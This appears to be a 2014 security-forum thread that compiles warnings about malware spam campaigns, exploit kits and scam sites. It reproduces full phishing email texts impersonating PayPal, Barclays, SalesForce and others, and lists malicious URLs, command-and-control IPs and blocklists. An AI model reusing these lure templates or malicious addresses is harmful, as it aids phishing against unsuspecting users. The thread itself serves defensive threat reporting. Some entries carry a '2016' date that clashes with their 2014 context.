Based on our analyses of the campaign, we were able to identify that this version of Sweet Orange uses vulnerabilities in Internet Explorer. The URL of the actual payload constantly changes, but they all use subdomains on the same Polish site mentioned earlier. However, the behavior of these payloads are identical. The final payloads of this attack are variants of the KOVTER malware family, which are detected as TROJ_KOVTER.SM. This particular family is known for its use in various ransomware attacks, although they lack the encryption of more sophisticated attacks like Cryptolocker. The websites that TROJ_KOVTER.SM accesses in order to display the fake warning messages are no longer accessible. Users who keep their systems up to date will not affected by this attack, as Microsoft released a patch for this particular vulnerability in May 2013. We recommend that read and apply the software security advisories by vendors like Microsoft, Java, and Adobe, as old vulnerabilities are still being exploited by attackers. Applying the necessary patches is essential part of keeping systems secure..."

:mad: :fear::fear:

FYI...

Fake delivery SPAM - word doc malware ...
- http://myonlinesecurity.co.uk/inform-package-way-fake-word-doc-malware/
15 Oct 2014 - "An email pretending that you have purchased an unspecified item from an unspecified store saying 'This is to inform you that the package is on its way to you' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Thank you for buying at our store!
Date ordered: October 14 2014
This is to inform you that the package is on its way to you. We also included delivery file to your shipping address.
Payment Nr : 7795816097 Order total : 527.54 USD Delivery date : 10/ 22th 2014.
Please review the attached document.

15 October 2014: 0048898757_order _doc.zip: Extracts to: 0048898757_order _doc.exe
Current Virus total detections: 7/54* . This 'This is to inform you that the package is on its way to you' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8c41235f43356c845b193b04efa60bbecb1787028e8ad6e25eb4c01ee2d94804/analysis/1413361301/
___

Fake 'Shipping Info' SPAM
- http://blog.dynamoo.com/2014/10/shipping-information-for-spam-uses.html
15 Oct 2014 - "This fake shipping spam contains malware.. although it appears that it may be buggy and might not install properly.

Screenshot: https://3.bp.blogspot.com/-l3nlpqmPSoo/VD6K3ZdvApI/AAAAAAAAF1E/a_k4VUkXNX0/s1600/shipping-info.png

The link in the email goes to https ://www.google .com/url?q=https%3A%2F%2Fcopy.com%2FEl9fd4VfLkfN%2FTrackShipment_0351.PDF.scr%3Fdownload%3D1&sa=D&sntz=1&usg=AFQjCNE0-3UrX7jNPzSGYodsQVzmBhrwMA which bounces through Google and then downloads a malicious executable TrackShipment_0351.PDF.scr which has a VirusTotal detection rate of 4/54*... What I think is meant to happen is that a malicious script that has been disguising itself as a GIF file which then renames a component Gl.png to Gl.exe and then attempts to execute it... This executable has a VirusTotal detection rate of 2/53**. It bombs out of automated analysis tools... possibly because it is being executed with the wrong parameters. It also opens a seemingly legitimate PDF file (VT 0/54***) which is designed to look like a Commercial Invoice, presumably to mask the fact that it is doing something malicious in the background.
> https://4.bp.blogspot.com/-86SXLSZk37U/VD6PBROpsAI/AAAAAAAAF1c/ZRCiUJev-KI/s1600/commerical-invoice.png
If you opened a file similar to this and you saw a PDF with a blank Commercial Invoice like the one pictured above, then you've probably been -infected- by the executable running in the background."
* https://www.virustotal.com/en-gb/file/e5f0ea546dcfb99803c9a02df82f587fa09b16c87337e868d8eabf360178ba59/analysis/1413383394/

** https://www.virustotal.com/en-gb/file/f9cca52c9d840f3cfc8997e77a42ebc7640ea71f7729fa1782d8596a05ed963b/analysis/1413384221/

*** https://www.virustotal.com/en-gb/file/409e472b667ae747942e10d4dc691796c3b2eb00a0e407146e69b2f8205de40c/analysis/1413384174/
___

Fake Paypal SPAM – PDF malware
- http://myonlinesecurity.co.uk/paypal-transaction-complete-fake-pdf-malware/
15 Oct 2014 - "'Transaction not complete' pretending to come from PayPal is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Unable to complete your most recent Transaction.
Currently your transaction has a pending status.
If the transaction was made by mistake please contact our customer service.
For more details please see attached payment receipt .

15 October 2014: Transaction25765048.zip: Extracts to: Transaction_21633987.scr
Current Virus total detections: 7/54* . This 'Transaction not complete' pretending to come from PayPal is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4b742cf87e49bc1cca0ce474ac34dd04ae00e28783aeafcfcd5a45a369be6543/analysis/1413387437/

:fear: :mad:

FYI...

Fake Bank SPAM
- http://blog.dynamoo.com/2014/10/barclays-bank-transaction-not-complete.html
16 Oct 2016 - "This fake Barclays spam leads to malware.
From: Barclays Bank [Barclays@email .barclays .co.uk]
Date: 16 October 2014 12:48
Subject: Transaction not complete
Unable to complete your most recent Transaction.
Currently your transaction has a pending status. If the transaction was made by mistake please contact our customer service.
For more details please download payment receipt below...

Clicking on the link downloads a file document23_pdf.zip containing a malicious executable document23_pdf.scr which has a VirusTotal detection rate of 4/54*. The Malwr report shows that it reaches out to the following URLs:
http ://188.165.214.6 :12302/1610uk1/HOME/0/51-SP3/0/
http ://188.165.214.6 :12302/1610uk1/HOME/1/0/0/
http ://188.165.214.6 :12302/1610uk1/HOME/41/5/1/
http ://jwoffroad .co.uk/img/t/1610uk1.osa
In my opinion 188.165.214.6 (OVH, France) is an excellent candidate to -block- or monitor. It also drops two executables, bxqyy.exe (VT 5/54** ...) and ldplh.exe (VT 1/51*** ...)."
* https://www.virustotal.com/en/file/626687777469a5a1cca0303fd565ee230fb5f5799a6d8cbaec097a5f7266eb28/analysis/1413462043/
... Behavioural information
DNS requests
jwoffroad .co.uk (88.208.252.216)
TCP connections
188.165.214.6: https://www.virustotal.com/en/ip-address/188.165.214.6/information/
88.208.252.216: https://www.virustotal.com/en/ip-address/88.208.252.216/information/

** https://www.virustotal.com/en/file/8d5d66e390e2293bec87422dfa2f4683b423e8084a07de207a75d2831f88d9a8/analysis/1413462507/

*** https://www.virustotal.com/en/file/752afd97f0473ec909797c02ac49b3f33e94ca06d6678af517d6d2fe98e00341/analysis/1413462517/
___

Many .su and .ru domains leading to malware
- http://blog.dynamoo.com/2014/10/a-bunch-of-su-and-ru-domains-leading-to.html
16 Oct 2016 - "These sites lead to some sort of malware. The presence of .SU domains hosted on what looks like a botnet is probably all you need to know.... recommend watching out for these..."
(Long list at the dynamoo URL above.)

- https://www.abuse.ch/?p=3581

- http://blog.dynamoo.com/2013/03/zbot-sites-to-block.html
"The obsolete .su (Soviet Union) domain is usually a tell-tale sign..."

___

Fake Invoice SPAM
- http://myonlinesecurity.co.uk/re-invoice-4023390-fake-pdf-malware/
16 Oct 2016 - "'RE: Invoice #4023390' pretending to come from Sage Accounting < Alfonso.Williamson@ sage-mail .com >is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Please see attached copy of the original invoice.

16 October 2014: Invoice_4017618.zip: Extracts to: Invoice_4017618.exe
Current Virus total detections: 5/54* . This RE: Invoice #4023390 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e9645b9120975b47e440f60c182e4701e14c9f653a55bb0b4bec82bb71fe1c2d/analysis/1413490281/
... Behavioural information
DNS requests
lewis-teck .co.uk (5.77.44.47)
TCP connections
188.165.214.6: https://www.virustotal.com/en/ip-address/188.165.214.6/information/
5.77.44.47: https://www.virustotal.com/en/ip-address/5.77.44.47/information/

:fear::fear: :mad:

FYI...

Fake Sage Invoice SPAM - malware
- http://blog.dynamoo.com/2014/10/sage-outdated-invoice-spam-spreads.html
17 Oct 2014 - "This -fake- Sage email spreads malware using a service called Cubby, whatever that is.

Screenshot: https://2.bp.blogspot.com/-UFvbcQMZeqc/VEDn4-OJqZI/AAAAAAAAF2I/M7n6GtqZVRM/s1600/sage3.png

Despite appearances, the link in the email (in this case) actually goes to https ://www.cubbyusercontent .com/pl/Invoice_032414.zip/_8deb77d3530f43be8a3166544b8fee9d and it downloads a file Invoice_032414.zip. This in turn contains a malicious executable Invoice_032414.exe which has a VirusTotal detection rate of 3/53*. The Malwr report shows HTTP conversations with the following URLs:
http :// 188.165.214.6 :15600/1710uk3/HOME/0/51-SP3/0/
http :// 188.165.214.6 :15600/1710uk3/HOME/1/0/0/
http :// 188.165.214.6 :15600/1710uk3/HOME/41/5/1/
http :// tonysenior .co.uk/images/IR/1710uk3.osa
188.165.214.6 is (not surprisingly) allocated to OVH France. In turn, it drops an executable bcwyw.exe (VT 6/54**...) which communicates with 66.102.253.25 (a China Telecom address located in the US in a Rackspace IP range) and also moxbk.exe (VT 1/52***...).
Recommended blocklist:
188.165.214.6
66.102.253.25
tonysenior .co.uk "
* https://www.virustotal.com/en-gb/file/a772bdadac8a2f4819519e3ffb10a4aca141d64d78660e78e6f42a6ceb509183/analysis/1413539374/
... Behavioural information
DNS requests
tonysenior .co.uk (66.7.214.212)
TCP connections
188.165.214.6: https://www.virustotal.com/en-gb/ip-address/188.165.214.6/information/
66.7.214.212: https://www.virustotal.com/en-gb/ip-address/66.7.214.212/information/

** https://www.virustotal.com/en-gb/file/30dc00ee245dc553d569b94cc13f1acfed70740c7c10405d164694bc7d065f9d/analysis/1413540238/

*** https://www.virustotal.com/en-gb/file/3a281070d196e0906851550c51c319843c0c99198a2f7b2e393e433aa0cb0b68/analysis/1413540261/
___

Fake 'SalesForce Security Update' SPAM – malware
- http://myonlinesecurity.co.uk/october-17-2014-salesforce-security-update-malware/
17 Oct 2014 - "'October 17, 2014 SalesForce Security Update' pretending to come from SalesForce .com <no-reply@ salesforce .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The malware inside this zip file is at this time -undetected- by any antivirus on Virus Total* and to make it much worse the Virus Total engine tries to tell you that the file is Probably harmless! There are strong indicators suggesting that this file is safe to use. This is an even bigger problem than it normally would be because of the recent Poodle bug and servers consequently changing their encryption routines to remove the vulnerable SSLv3 version from being used. It is eminently believable that you might need to change the SSL certificate on your browser to comply with the new behaviour if you are not a security or network IT specialist. This is obviously -wrong- and this type of malware that disguises itself as a legitimate file and can apparently conceal the malicious functions from an antivirus scan and make it believe it is innocent is very worrying. The MALWR analysis doesn’t show -anything- wrong and doesn’t show any network connections or other files downloaded. Anubis also comes up with a -nothing- on this one... a couple of manual analysis done by Virus total** users who find it -is- malicious... drops this file which -is- detected... Our friends at TechHelpList(1) have done an analysis on this one which clearly shows its bad behaviour and what it connects to and downloads...
* https://www.virustotal.com/en/file/9519da9cbbf2a13b24e807f40d1537bb1913818ea91ecfe95323326f96632617/analysis/1413556548/

** https://www.virustotal.com/en/file/93691ef6e834951225ad024a6b662e857a47c2f5156e3def9f38ae964143c241/analysis/

1) https://techhelplist.com/index.php/spam-list/664-date-salesforce-security-update-virus

The email looks like:
Dear client,
You are receiving this notification because your Salesforce SSL certificate has expired.
In order to continue using Salesforce.com, you are required to update your digital certificate.
Download the attached certificate. Update will be automatically installed by double click.
According to our Terms and Conditions, failing to renew the SSL certificate will result in account suspension or cancelation... Thank you for using Salesforce .com

17 October 2014: cert_update.zip: Extracts to: cert_update.scr
Current Virus total detections: 0/52* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an icon of a white & red circular arrow instead of the .scr ( executable) file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/9519da9cbbf2a13b24e807f40d1537bb1913818ea91ecfe95323326f96632617/analysis/1413556548/
___

Fake eFax SPAM
- http://blog.dynamoo.com/2014/10/efax-message-from-02086160204-spam.html
17 Oct 2014 - "This fake eFax spam leads to malware:
From: eFax [message@ inbound .claranet .co.uk]
Date: 17 October 2014 11:36
Subject: eFax message from "02086160204" - 1 page(s), Caller-ID: 208-616-0204
Fax Message [Caller-ID: 208-616-0204]
You have received a 1 page fax at 2014-10-17 09:34:48 GMT.
* The reference number for this fax is lon2_did11-4056638710-9363579926-02.
Please visit... to view this message in full...

The link in the email goes to some random hacked WordPress site or other with a URL with a format similar to the following:
http ://tadarok .com/wp-content/themes/deadline/mess.html
http ://107.170.219.47 /wp-content/themes/inove/mess.html
http ://dollfacebeauty .com.au/wp-content/themes/landscape/mess.html
Then (if your user agent and referrer are correct) it goes to a -fake- eFax page at http ://206.253.165.76 :8080/ord/ef.html which does look pretty convincing. (Incidentally if the UA or referrer are not right you seem to get dumped on a pills site of naturaldietpills4u .com).

Screenshot: https://1.bp.blogspot.com/-IzglVG8I_co/VED-m9ehHQI/AAAAAAAAF2Y/HyA5Tk30D9E/s1600/efax2.png

The download link goes to http ://206.253.165.76: 8080/ord/FAX_20141008_1412786088_26.zip which is a ZIP file containing a malicious executable FAX_20141008_1412786088_26.exe which has a VirusTotal detection rate of 4/54*... Recommended blocklist:
107.170.19.156
212.59.117.207
206.253.165.76 "
* https://www.virustotal.com/en-gb/file/b2b9486a36dff94a3222c16d309c073da61a98dfa1c1d303b5d3740f54842ff6/analysis/1413545028/
___

Fake Virgin Media SPAM - phish/malware
- http://myonlinesecurity.co.uk/help-advice-virgin-media-malware/
17 Oct 2014 - "An email with a subject of 'Help & Advice – Virgin Media' pretending to come from Virgin Media is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Virgin Media Automated Billing Reminder
Date 17th October 2014
This e-mail has been sent you by Virgin Media to inform you that we were unable to process your most recent payment of bill. This might be due to one of the following reasons:
A recent change in your personal information such as Name or address.
Your Credit or Debit card has expired.
Insufficient funds in your account.
Cancellation of Direct Debit agreement.
Your Card issuer did not authorize this transaction.
To avoid Service interruption you will need to update your billing profile, failure to update your profile may lead in service cancellation and termination.
Please click on the link below to login to e-Billing. You will need to login using your primary E-mail address...

Be very careful with email attachments. -All- of these emails use Social engineering tricks to persuade you to open the attachments or follow the links... -Never- just blindly click on the file in your email program. Always save the file to your downloads folder, so you can check it first. Most ( if not all) malicious files that are attached to emails will have a -faked- extension..."
___

More Free Facebook Hacks ...
- https://blog.malwarebytes.org/fraud-scam/2014/10/more-free-facebook-hacking-sites-surface-online/
Oct 16, 2014 - "... more sites claiming to offer hacking services that target Facebook users. The sites are:
fbwand(dot)com
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/fbwand.png

hackfbaccountlive(dot)com
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/hackfbaccountlive.png

One starts off by entering the profile URL of the Facebook user account (the target) he/she wants to hack. The site then makes him/her believe that an -actual- hacking is ongoing, firstly, by retrieving and displaying specific information from Facebook’s Graph Search*, such as user ID, user name, and a large version of the profile photo, to the page; and, secondly, by providing the attacker the progress of completion of each hacking attempt. Below are screenshots of these attempts, beginning with purportedly fetching the target’s email ID:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/05-verify.png?w=564
After a successful “hack”, the site informs the attacker that they have created an account for them on the website, complete with a generated user name and password, and that they have to log in to their accounts to retrieve the target’s Facebook account details. Just when it seems too easy, the attacker sees this upon logging in:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/hackers-panel.png
He/She is instructed to unlock the details in two ways. One is to share a generated referral link to their social networks (particularly Facebook and/or Twitter) in order to get 15 visitors to click it... Although it’s true that no website is perfectly secure one must not attempt to hack into them nor break into someone else’s online profile. These are illegal acts. Sites marketing themselves as free, user-friendly hacking-as-a-service (HaaS) tool, such as those I mentioned here, generally takes advantage of user distrust against someone and profits on it, promising big but deliver nothing in the end. Avoid them at all cost."
* https://www.facebook.com/about/graphsearch
___

Ebola Phishing Scams and Malware Campaigns
- https://www.us-cert.gov/ncas/current-activity/2014/10/16/Ebola-Phishing-Scams-and-Malware-Campaigns
Oct 16, 2014 - "... protect against email scams and cyber campaigns using the Ebola virus disease (EVD) as a theme. Phishing emails may contain links that direct users to websites which collect personal information such as login credentials, or contain malicious attachments that can infect a system. Users are encouraged to use caution when encountering these types of email messages and take the following preventative measures to protect themselves:
- Do not follow unsolicited web links or attachments in email messages.
- Maintain up-to-date antivirus software..."
___

CUTWAIL Spambot Leads to UPATRE-DYRE Infection
- http://blog.trendmicro.com/trendlabs-security-intelligence/cutwail-spambot-leads-to-upatre-dyre-infection/
Oct 16, 2014 - "... new spam attack disguised as invoice message notifications was recently seen spreading the UPATRE malware, that ultimately downloads its final payload- a BANKER malware related to the DYREZA/DYRE banking malware... In early October we observed a surge of spammed messages sent by the botnet CUTWAIL/PUSHDO, totaling to more than 18,000 messages seen in a single day. CUTWAIL/PUSHDO has been in the wild since as early as 2007 and was considered one of the biggest spam botnets in 2009. We spotted some spammed emails that disguise itself as invoice message notifications or “new alert messages” from various companies and institutions.
Screenshot of spammed messages related to CUTWAIL/PUSHDO:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/Cutwail_samples.jpg
Top spam sending countries for this CUTWAIL spam run:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/Top-spam-sending-countries-01.jpg
... Based on our 1H 2014 spam report, UPATRE is the top malware seen in spam emails. With its continuously developing techniques, UPATRE remains as one of most prevalent malware today. Examples of newer UPATRE techniques are its ability to use password-protected archives as attachments, and abuse of online file storage platform, Dropbox in order to bypass spam filters.
Top malware distributed via spam as of August 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/CUTWAIL-Spambot_fig1.jpg
... in this attack, this UPATRE variant, TROJ_UPATRE.YYJS downloads the final payload, TSPY_BANKER.COR, which is related to DYREZA/DYRE banking malware. The DYREZA malware is a banking malware with the following capabilities:
- Performs man-in-the-middle attacks via browser injections
- Steals banking credentials and monitors online banking session/transactions
- Steals browser snapshots and other information
Based on our analysis, TSPY_BANKER.COR connects to several websites to receive and send information. Given this series of malware infections, affected systems also run the risk of having their sensitive data stolen (such as banking credentials data) in order to be used for other future attacks. Apart from the risk of stolen information, this spam attack also highlights the risk of traditional threats (like spam) being used as a vehicle for -other- advanced malware to infect systems. This may consequently even lead to infiltrating an entire enterprise network... We highly recommend that users take extra caution when dealing with emails that contain attachments and URLs in the email body. Ensure that the domains are legitimate and take note of the company name indicated in the email. Another tip is to steer clear of suspicious-looking archive files attached to emails, such as those ending in .ZIP, or .RAR. UPATRE is also known to use email templates through DocuSign with emails that come in the form of -bank- notifications, -court- notices, and -receipts- ..."
___

WhatsApp Spam
- http://threattrack.tumblr.com/post/100162392338/whatsapp-spam
Oct 16, 2014 - "Subjects Seen:
Voice Message Notification
Typical e-mail details:
You have a new voicemail!
Details:
Time of Call: Oct-13 2014 06:02:04
Lenth of Call: 07sec

Malicious URLs:
p30medical .com/dirs.php?rec=LLGIAmEUFLipINmiPz4S0g
Malicious File Name and MD5:
VoiceMail.zip (713A7D2A9930B786FE31A603CD06B196)
VoiceMail.exe (2B7E9FC5A65FE6927A84A35B5FEAC062)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/5fe4acaac97621cafb4688b950049ac6/tumblr_inline_ndjlwzSYyI1r6pupn.png

Tagged: Whatsapp, Kuluoz

:fear::fear: :mad:

FYI...

Evil network: 5.135.230.176/28 - OVH
- http://blog.dynamoo.com/2014/10/evil-network-513523017628-ovh-eldar.html
18 Oct 2014 - "These domains are currently hosted or have recently been hosted on 5.135.230.176/28 and all appear to be malicious in some way, in particular some of them have been hosting the Angler EK* (hat tip)... 5.135.230.176/28 is an OVH IP range allocated to what might be a ficticious customer:
organisation: ORG-EM25-RIPE
org-name: eldar mahmudov
org-type: OTHER
address: ishveran 9
address: 75003 paris
address: FR
e-mail: mahmudik@ hotmail .com
abuse-mailbox: mahmudik@ hotmail .com
phone: +33.919388845
mnt-ref: OVH-MNT
mnt-by: OVH-MNT
changed: noc@ ovh .net 20140621
source: RIPE
There appears to be nothing legitimate at all in this IP address range, I strongly recommend that you -block- traffic going to it."
* http://malware-traffic-analysis.net/2014/10/06/index.html

Diagnostic page for AS16276 (OVH)
- https://www.google.com/safebrowsing/diagnostic?site=AS:16276
"... over the past 90 days, 4009 site(s)... resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2014-10-18, and the last time suspicious content was found was on 2014-10-18... we found 543 site(s) on this network... that appeared to function as intermediaries for the infection of 4498 other site(s)... We found 1150 site(s)... that infected 2883 other site(s)..."
___

malwr
- https://malwr.com/
Oct. 19, 2014 - "Last Comments:
Malware.
222.236.47.53:8080 195.206.7.69:443 46.55.222.24:8080 162.144.60.252:8080 91.212.253.253:443 95.141.32.134:8080"
- https://malwr.com/about/ >> http://www.shadowserver.org/ *

- 222.236.47.53: https://www.virustotal.com/en/ip-address/222.236.47.53/information/
- 195.206.7.69: https://www.virustotal.com/en/ip-address/195.206.7.69/information/
- 46.55.222.24: https://www.virustotal.com/en/ip-address/46.55.222.24/information/
- 162.144.60.252: https://www.virustotal.com/en/ip-address/162.144.60.252/information/
- 91.212.253.253: https://www.virustotal.com/en/ip-address/91.212.253.253/information/
- 95.141.32.134: https://www.virustotal.com/en/ip-address/95.141.32.134/information/

Bot Count Graphs
* https://www.shadowserver.org/wiki/pmwiki.php/Stats/BotCountYearly#toc1
Page last modified on Sunday, 19 October 2014
___

- http://blog.dynamoo.com/2014/10/final-notification-malware-spam-uses.html
17 Oct 2014
... ShippingLable_HSDAPDF.scr
- https://www.virustotal.com/en/file/9ad980467347dffbb50493c93ca834c40dbfdec61fc1339004a107aef6633ed2/analysis/1413566277/
... Comments:
Full list of CnCs:
5.135.28.118: https://www.virustotal.com/en/ip-address/5.135.28.118/information/
185.20.226.41: https://www.virustotal.com/en/ip-address/185.20.226.41/information/
5.63.155.195: https://www.virustotal.com/en/ip-address/5.63.155.195/information/
___

RIG Exploit Kit Dropping CryptoWall 2.0
- http://www.threattracksecurity.com/it-blog/rig-exploit-kit-dropping-cryptowall-2-0/
Oct 17, 2014 - "... observed spammers exploiting vulnerable WordPress links to -redirect- users to servers hosting the RIG Exploit Kit, which takes advantage of any number of vulnerabilities in unpatched Silverlight, Flash, Java and other applications to drop CryptoWall 2.0... nasty updated version of CryptoWall, which has built up steam since the disruption of CryptoLocker. Once infected with CryptoWall 2.0, users’ files are encrypted and held for ransom. The spammers behind this latest campaign seem to be the same crew behind a recent wave of eFax spam reported over at Dynamoo’s Blog*... The campaign Dynamoo revealed is being hosted side-by-side on the same server as the RIG Exploit Kit: hxxp ://206.253.165.76 :8080. The exploit redirector is hxxp ://206.253.165.76 :8080/ord/rot.php. And the spam Dynamoo reported is hxxp ://206.253.165.76 :8080/ord/ef.html... The exploit redirector is hxxp :// 206.253.165.76 :8080/ord/rot.php... malicious link loads a RIG Exploit Kit landing page to exploit any of its targeted vulnerabilities to drop CryptoWall 2.0. The MD5 of the sample analyzed is 8cc0ccec8483dcb9cfeb88dbe0184402 ..."
* http://blog.dynamoo.com/2014/10/efax-message-from-02086160204-spam.html

206.253.165.76: https://www.virustotal.com/en/ip-address/206.253.165.76/information/

:mad: :fear:

FYI...

Fake 'unpaid invoice' SPAM - xls malware
- http://myonlinesecurity.co.uk/acorn-engineering-limited-trading-unpaid-invoice-court-action-fake-excel-xls-malware/
20 Oct 2014 - "An email pretending to be an unpaid invoice and threatening court action with a subject of 'Acorn Engineering Limited trading' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Acorn-Maintenance-Engineering-logo...
October 20, 2014
Head Office
Acorn Engineering Limited trading
as Acorn Maintenance
Acorn House
20 Wellcroft Road
Slough
Berkshire
SL1 4AQ
Tel: 01753 386 073
Fax: 01753 409 672
Dear ...
Reference: 48771955-A8
Court action will be the consequence of your ignoring this letter.
Despite our telephone calls on October 10 and our letters of September 25, 2014 and October 20, 2014, and your promise to pay, payment of your account has still not been received. If full payment is not received by October 22, 2014 court action will be taken against your company.
If you allow this to happen you will incur court costs and you may forfeit your company’s credit status because the name of your company will be recorded by the major credit reference agencies. This may deter others from supplying you.
You are also being charged debt recovery costs and statutory interest of 8% above the reference rate (fixed for the six month period within which date the invoices became overdue) pursuant to the late payment legislation.
To stop this from happening please pay in full now the overdue invoice which is also attached to this letter.
Yours truly,
signature-Mishenko.gif (626?272)
Nadine Cox,
Accountant
Acorn Engineering Limited
Enclosure (Attachment)

20 October 2014: Copy4313_B0.zip: Extracts to: Invoice_7380901925299.xls.exe
Current Virus total detections: 3/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft Excel xls file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/02b93640df6c19e6e77de029688e7dc2cdf6cf0a8a8f68ea0e1777d2ddd98097/analysis/1413800273/
___

Fake PDF invoice SPAM
- http://www.symantec.com/connect/blogs/pdf-invoices-may-cost-more-you-expect
Oct 20, 2014 - "... Over the past week, Symantec has observed a spam campaign involving suspicious emails that masquerade as unpaid invoices. However, these suspicious emails come with a nasty surprise attached in the form of a malicious .pdf file.
Malicious .pdf file attached to suspicious email:
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Fig1_19.png
While these invoices may appear to be legitimate because the sender’s email address may be associated with a major company, the emails contain spelling errors in the subject line and the body of the email contains just one line of text. Most business emails contain a personal greeting to the recipient and the sender’s signature, but these emails have neither. These signs should serve as warnings to users that the email is not what it claims to be. The attached .pdf file has malicious shellcode hidden inside of it that will be executed when opened with a vulnerable version of Adobe Reader... attackers are trying to exploit the Adobe Acrobat and Reader Unspecified Remote Integer Overflow Vulnerability (CVE-2013-2729) by triggering the vulnerability while parsing the crafted Bitmap encoded image... The embedded shellcode acts as a downloader which downloads a malicious executable file (Infostealer.Dyranges) from a remote location. The downloaded malware attempts to install itself as a service called “google update service”... If successful, the malware is then able to steal confidential information entered into Web browsers by the user. Symantec recommends that users exercise caution when opening emails and attachments from unexpected or unknown senders. We also advise that PDF viewers and security software be kept up-to-date. Symantec detects the malicious .pdf file used in this campaign as Trojan.Pidief*."
* http://www.symantec.com/security_response/writeup.jsp?docid=2009-121708-1022-99&tabid=2
___

Fake 'LogMeIn Security Update' SPAM – PDF malware
- http://myonlinesecurity.co.uk/october-16-2014-logmein-security-update-fake-pdf-malware/
20 Oct 2014 - "An email that says it is an announcement that you need to install a new 'LogMeIn security certificate' which pretends to come from LogMeIn .com < auto-mailer@ logmein .com > with a subject of October 16, 2014 'LogMeIn Security Update' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/LogMeIn-security-update.png

20 October 2014: cert_client.zip: Extracts to: cert_1020.scr
Current Virus total detections: 1/52* . This October 16, 2014 'LogMeIn Security Update' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a legitimate file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/19d11eec77e1f1b6179005277d67a8640b5f5bf573dac486c7e1e6baea227c59/analysis/1413811609/
___

Fake 'my new photo ;)' SPAM - trojan variant
- http://blog.mxlab.eu/2014/10/20/latest-email-my-new-photo-contains-a-new-trojan-variant/
Oct 20, 2014 - "... intercepted a new trojan variant distribution campaign by email with the subject “my new photo ;)”... sent from the spoofed email addresses and has the following short body:

my new photo ;)

The attached ZIP file has the name photo.zip, once extracted a folder photo is available with that contains the 57 kB large file photo.exe . The trojan is known as a variant of HEUR/QVM03.0.Malware.Gen or Win32:Malware-gen. At the time of writing, 2 of the 53 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en-gb/file/83912dc14a7de0ae2dbc6f12f2a5dbb54e2d94861ec6214163eaa2031df1b9b5/analysis/1413812842/
___

Fake Invoice SPAM – word doc malware
- http://myonlinesecurity.co.uk/adobe-invoice-word-doc-malware/
20 Oct 2014 - "An email pretending to come from Adobe with the subject of 'Adobe Invoice' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has an attachment that looks like a proper word.doc but something has disinfected all copies on its travels. All copies that I have received have been -less- than 1kb in size and are empty files with a name only adb-102288-invoice.doc . They are almost certainly supposed to be the typical malformed word docs, that contain a macros script -virus- we have been seeing so much recently that will infect you if you open or even preview them when you have an out of date or vulnerable version of Microsoft word on your computer... The email looks like:
Adobe(R) logo
Dear Customer,
Thank you for signing up for Adobe Creative Cloud
Service.
Attached is your copy of the invoice.
Thank you for your purchase.
Thank you,
The Adobe Team
Adobe Creative Cloud Service...

Never just blindly click on the file in your email program. Always save the file to your downloads folder, so you can check it first. Most (if not all) malicious files that are attached to emails will have a faked extension..."

- http://blog.dynamoo.com/2014/10/adobe-billing-adobe-invoice-spam-adb.html
20 Oct 2014
Screenshot: https://1.bp.blogspot.com/-mt-vGbR2Q-U/VEUFltRbPGI/AAAAAAAAF3E/b3_TOFcDpHk/s1600/adobe.png
> https://www.virustotal.com/en-gb/file/bc79dea26a2ec94646dcbad540d3921198c46701359539925e530839aa68fb13/analysis/1413809174/
... Behavioural information
TCP connections
62.75.182.94: https://www.virustotal.com/en-gb/ip-address/62.75.182.94/information/
208.89.214.177: https://www.virustotal.com/en-gb/ip-address/208.89.214.177/information/
___

Dropbox phish - hosted on Dropbox
- http://www.symantec.com/connect/blogs/dropbox-users-targeted-phishing-scam-hosted-dropbox
